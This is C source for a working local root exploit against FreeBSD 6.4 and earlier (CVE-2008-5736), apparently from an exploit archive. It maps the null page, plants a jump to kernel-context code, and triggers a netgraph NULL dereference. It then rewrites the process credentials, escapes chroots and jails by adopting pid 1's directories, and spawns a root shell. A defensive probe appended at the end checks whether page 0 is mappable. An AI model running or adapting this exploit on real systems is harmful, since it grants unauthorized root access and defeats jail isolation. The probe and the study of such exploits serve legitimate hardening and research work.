/*
 * FreeBSD <= 6.4-RELEASE Netgraph Exploit
 * by zx2c4
 *
 *
 * This is an exploit for CVE-2008-5736, the FreeBSD protosw
 * and loosely based on Don Bailey's 2008 exploit -
 * http://www.exploit-db.com/exploits/7581/ . The thing with
 * Don's exploit is that it relies on having a known location
 * of allproc, which means having access to the kernel or
 * debugging symbols, either of which might not be available.
 * Initial attempts included a general memory search for some
 * characteristics of allproc, but this was difficult to make
 * reliable. This solution here is much more standard - get
 * the current thread, change its permissions, and execl to
 * a shell. Additionally, it breaks out of chroots and FreeBSD
 * jails by reparenting to pid 1 and copying its fds.
 *
 * This reliably works on kernels on or below 6.4-RELEASE:
 *
 * $ gcc a.c
 * $ ./a.out
 * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~
 * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~
 * ~~~~~ greetz to don bailey, edemveiss ~~~~~
 *
 * [+] mmapping null page
 * [+] adding jmp to pwnage in null page
 * [+] opening netgraph socket
 * [+] triggering null dereference
 * [+] elevating permissions
 * [+] got root!
 * #
 *
 * It's an oldie, but simple enough that someone needed
 * to write another PoC exploit at some point.
 *
 * cheers,
 * zx2c4, 27-2-2011
 */

#define _KERNEL
#include <sys/types.h>
#include <sys/time.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/ucred.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/filedesc.h>
#include <sys/queue.h>
#include <netgraph/ng_socket.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

#define PAGES 1

volatile int got_root = 0;

/* Entered in kernel context once the kernel takes the jump planted
 * in the null page. Rewrites the calling thread's credentials and
 * directories, then returns so the syscall can complete. */
int root(void)
{
	struct thread *thread;

	/* curthread is kept at %fs:0 on FreeBSD/i386 */
	asm("movl %%fs:0, %0" : "=r"(thread));

	thread->td_critnest = 0;
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;

	/* walk up the process tree to pid 1 and adopt its root, jail
	 * and current directories, which escapes chroots and jails */
	struct proc *parent = thread->td_proc;
	while (parent->p_pptr && parent->p_pid != 1)
		parent = parent->p_pptr;
	thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir;
	thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir;
	thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir;
	thread->td_proc->p_pptr = parent;

	got_root = 1;
	return 0;
}

int main(int argc, char *argv[])
{
	printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
	printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
	printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");

	printf("[+] mmapping null page\n");
	/* mmap() returns a pointer, so test against MAP_FAILED rather
	 * than comparing the pointer with 0 */
	if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
	         MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
		perror("[-] mmap failed");
		return -1;
	}

	printf("[+] adding jmp to pwnage in null page\n");
	*(char *)0x0 = 0x90;
	*(char *)0x1 = 0xe9;
	*(unsigned long *)0x2 = (unsigned long)&root;

	printf("[+] opening netgraph socket\n");
	int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
	if (s < 0) {
		perror("[-] failed to open netgraph socket");
		return -1;
	}

	printf("[+] triggering null dereference\n");
	shutdown(s, SHUT_RDWR);
	if (!got_root) {
		printf("[-] failed to trigger pwnage\n");
		return -1;
	}

	printf("[+] elevating permissions\n");
	setuid(0);
	setgid(0);
	if (getuid() != 0) {
		printf("[-] failed to get root\n");
		return -1;
	}

	printf("[+] got root!\n");
	execl("/bin/sh", "sh", NULL);
	return 0;
}
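The first step of the exploit above, mapping the page at address 0, is the precondition every kernel NULL-pointer-dereference exploit of this kind shares, and it is also the point where a hardened kernel stops it: FreeBSD refuses such mappings when the sysctl security.bsd.map_at_zero is 0, and Linux refuses them for unprivileged processes when vm.mmap_min_addr is above 0. The probe below is an added example written for this page, not code from zx2c4's exploit; it assumes only POSIX mmap and asks the running kernel for a verdict, using a read/write mapping (no PROT_EXEC) and releasing it immediately. Run it as the unprivileged user whose exposure you want to measure.

```c
/* null_page_probe.c: added example, not part of the original exploit.
 * Reports whether this process may map the page at address 0, which a
 * kernel NULL-dereference exploit needs before it can plant a jump there.
 * Hardening that makes the probe fail: FreeBSD security.bsd.map_at_zero=0,
 * Linux vm.mmap_min_addr > 0 (both assumed, not taken from the page). */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANON
#define MAP_ANON MAP_ANONYMOUS
#endif

/* Returns 1 if the page at address 0 could be mapped, 0 if the kernel
 * refused. On refusal *err_out receives errno (EPERM on Linux with
 * mmap_min_addr set; the FreeBSD error code depends on the release);
 * on success *err_out is set to 0. */
int null_page_mappable(int *err_out)
{
    long page = sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                   MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) {
        if (err_out)
            *err_out = errno;
        return 0;
    }
    /* The mapping succeeded at address 0 (MAP_FIXED guarantees the
     * address); we only wanted the verdict, so release it at once. */
    munmap(p, (size_t)page);
    if (err_out)
        *err_out = 0;
    return 1;
}

int main(void)
{
    int err = 0;
    if (null_page_mappable(&err)) {
        printf("[!] page 0 is mappable: NULL-dereference exploits can plant code there\n");
        printf("    FreeBSD: sysctl security.bsd.map_at_zero=0; Linux: raise vm.mmap_min_addr\n");
        return 1;
    }
    printf("[+] kernel refused to map page 0 (%s)\n", strerror(err));
    return 0;
}
```

The exit status follows the verdict (1 when page zero is mappable, 0 when the kernel refuses), so the probe can be dropped into a host-hardening check script as-is; note that a root process, or one holding a raw-I/O capability, may be allowed the mapping even where an unprivileged user is not, which is why the measurement should be taken from the account you actually care about.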